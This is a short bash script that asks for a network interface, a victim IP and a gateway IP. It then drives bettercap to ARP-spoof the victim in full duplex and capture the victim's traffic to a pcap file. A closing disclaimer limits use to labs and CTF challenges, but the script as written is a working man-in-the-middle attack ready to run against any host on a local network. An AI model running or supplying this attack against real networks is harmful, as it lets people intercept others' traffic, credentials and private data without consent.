#!/bin/bash
#Remember use sudo bettercap -iface "$iface", probe.on, net.show to find ip

# Insert iface, ip gateway and ip target
read -p "Insert network interface name: " iface
read -p "Insert IP target: " victim
read -p "Insert IP router/gateway: " router

#Show it
echo "    Interface: $iface"
echo "    Victim:     $victim"
echo "    Gateway:     $router"

#Launch bettercap against target 
sudo bettercap -iface "$iface" <<EOF
set arp.spoof.targets $victim
set arp.spoof.gateway $router
set arp.spoof.fullduplex true
set net.sniff.output bettercup_traffic_$victim.pcap

arp.spoof on
net.sniff on
events.stream on
EOF

# DISCLAIMER:
# This script is for educational and demonstration purposes only.
# It is intended to be used in controlled, legal environments such as labs or CTF challenges.
# Using Bettercap against systems you do not own or lack explicit authorization to test is illegal.
# The author is not responsible for any misuse or damage resulting from the execution of this script.
